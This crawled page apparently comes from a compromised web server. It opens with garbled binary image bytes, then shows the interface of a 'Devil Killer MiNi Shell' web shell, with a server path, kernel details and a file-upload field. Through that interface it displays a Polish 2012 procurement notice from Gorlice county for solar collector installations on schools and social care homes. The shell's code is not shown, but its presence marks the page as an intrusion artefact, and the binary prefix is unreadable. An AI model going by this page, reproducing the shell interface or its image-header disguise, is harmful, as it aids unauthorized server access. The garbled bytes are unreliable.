JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/29608-N-2012.html

<p class="kh_header"><b>Gorlice: Wykonanie instalacji kolektorów słonecznych na obiektach oświatowych i pomocy społecznej Powiatu Gorlickiego w ramach projektu pn: Ochrona powietrza atmosferycznego przez montaż kolektorów słonecznych na obiektach oświatowych i pomocy społecznej Powiatu Gorlickiego, współfinansowanego środkami Unii Europejskiej w Ramach Małopolskiego Regionalnego Programu Operacyjnego. Działanie 7.2.</b><br>
<b>Numer ogłoszenia: 29608 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Gorlicach , ul. Biecka 3, 38-300 Gorlice, woj. małopolskie, tel. 018 3548751, faks 018 3537545.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatgorlicki.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie instalacji kolektorów słonecznych na obiektach oświatowych i pomocy społecznej Powiatu Gorlickiego w ramach projektu pn: Ochrona powietrza atmosferycznego przez montaż kolektorów słonecznych na obiektach oświatowych i pomocy społecznej Powiatu Gorlickiego, współfinansowanego środkami Unii Europejskiej w Ramach Małopolskiego Regionalnego Programu Operacyjnego. Działanie 7.2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na obiektach oświatowych i pomocy społecznej Powiatu Gorlickiego w ramach zadania pn. Ochrona powietrza atmosferycznego przez montaż kolektorów słonecznych na obiektach oświatowych i pomocy społecznej Powiatu Gorlickiego współfinansowanego środkami Unii Europejskiej, w ramach Małopolskiego Regionalnego Programu Operacyjnego, Działanie 7.2.
Wykonanie instalacji kolektorów słonecznych na budynku Specjalnego Ośrodka Szkolno - Wychowawczego w Szymbarku, Wykonanie instalacji kolektorów słonecznych na budynku Specjalnego Ośrodka Szkolno - Wychowawczego w Kobylance, Wykonanie instalacji kolektorów słonecznych na budynku Internatu Zespołu Szkół Nr 1 w Gorlicach ul. Wyszyńskiego 11, Wykonanie instalacji kolektorów słonecznych na budynku Internatu Zespołu Szkół Zawodowych w Bobowej,
Wykonanie instalacji kolektorów słonecznych na budynku Powiatowego Zespołu Placówek Oświatowych w Bieczu (dawniej Internat ZSO w Bieczu), Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej w Gorlicach przy ul. Sienkiewicza 30, Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej w Klimkówce, Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej w Gorlicach przy ul. Michalusa 14, wraz z budową kotłowni gazowej dla potrzeb ciepłej wody użytkowej, oraz przebudową istniejącej wymiennikowni ciepła..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Składana oferta w zakresie każdego z poszczególnych zadań, musi być zabezpieczona wadium w wysokości:  2.000 zł
(słownie: dwa tysiące złotych)

2. Zamawiający informuje, że powyższa kwota wadium obowiązuje w zakresie każdego zadania. W przypadku złożenia oferty na kilka wybranych zadań, Wykonawca zobowiązany jest do wniesienia wadium na każde z wybranych zadań (kwota wadium x ilość zadań) ! 

3. Wadium może być wnoszone w następujących formach:
w pieniądzu (wyłącznie przelewem na rachunek bankowy zamawiającego),
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie 	kasy jest zawsze poręczeniem pieniężnym,
w gwarancjach bankowych,
w gwarancjach ubezpieczeniowych,
w poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  Nr 109, poz.1158 z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania Nr: 1, 2, 3 ,4 ,5, 6, 7, 8
za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie - art.22 ust1 ustawy (załącznik nr 4 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania Nr: 1
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 120.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).

dla Zadania Nr: 2
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 90.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).

dla Zadania Nr: 3
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 100.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).

dla Zadania Nr: 4
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 90.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).

dla Zadania Nr: 5
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 120.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).


dla Zadania Nr: 6
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 90.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).

dla Zadania Nr: 7
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 60.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).

dla Zadania Nr: 8
za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania, co najmniej dwóch zamówień (należy traktować jako dwie odrębne realizacje, roboty budowlane, wykonane na rzecz tego samego lub dwóch różnych zleceniodawców-zamawiających), odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co Zamawiający rozumie kompleksowe wykonanie instalacji kolektorów słonecznych (dostawa kolektorów wraz z ich zamontowaniem), o wartości nie mniejszej niż 150.000 zł (brutto) każde z wykonanych zamówień, z podaniem nazwy zleceniodawcy (poprzednio zamawiający), terminu realizacji, wartości wykazanych zamówień (według wzoru stanowiącego załącznik nr 6 do SIWZ), a także załączeniem dokumentów potwierdzających, że zamówienia (roboty) te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ((referencje i/lub opinie i/lub protokoły odbioru ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania Nr: 1, 2, 3 ,4 ,5, 6, 7, 8
za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie - art.22 ust1 ustawy (załącznik nr 4 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania Nr: 1, 2, 3 ,4 ,5, 6, 7, 8
za spełnienie powyższego warunku, zamawiający uzna dysponowanie potencjałem kadrowym (3 osoby) niezbędnym do realizacji zamówienia tj. kierownik budowy, który posiada aktualne uprawnienia do kierowania robotami budowlanymi w specjalności: konstrukcyjno-budowlanej, a także osoby mające uprawnienia w  zakresie instalacji elektrycznej i sanitarnej, gdzie osoby te winny posiadać aktualny wpis w zakresie przynależności do stosownej Izby Inżynierów Budownictwa (załącznik nr 7 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania Nr: 1, 2, 3 ,4 ,5, 6, 7, 8
za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie - art.22 ust1 ustawy (załącznik nr 4 do SIWZ),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oferta na formularzu ofertowym, wypełniona i podpisana przez Wykonawcę, o treści zgodnej z określoną we wzorze 	stanowiącym zał. nr 3 do SIWZ;
2)	Kosztorys ofertowy - uproszczony sporządzony przez Wykonawcę zgodnie z zapisem zawartym Ogólnej Specyfikacji 	Technicznej (OST) stanowiącej załącznik nr 1 do SIWZ,
3)	dokument (np. pełnomocnictwo, umowa spółki cywilnej, zaświadczenie o wpisie do ewidencji działalności  
	gospodarczej, itp.) potwierdzający, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania 
	 Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zakresie zmiany terminu realizacji zamówienia:

zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego;
wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów;
wystąpienie siły wyższej;
nie przekazania przez zamawiającego placu budowy w terminie kreślonym w umowie;
niezawinionego przez wykonawcę ograniczenia dostępności placu budowy w czasie realizacji robót;
wstrzymania przez zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie wykonawcy. (Nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru inwestorskiego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę).
zmiany zasad warunków dofinansowania inwestycji,
konieczności wykonania przez zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatgorlicki.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Gorlicach, ul. 11 Listopada 6, 38-300 Gorlice, pok. Nr 309, tel. 018/ 354-87-91.</p>
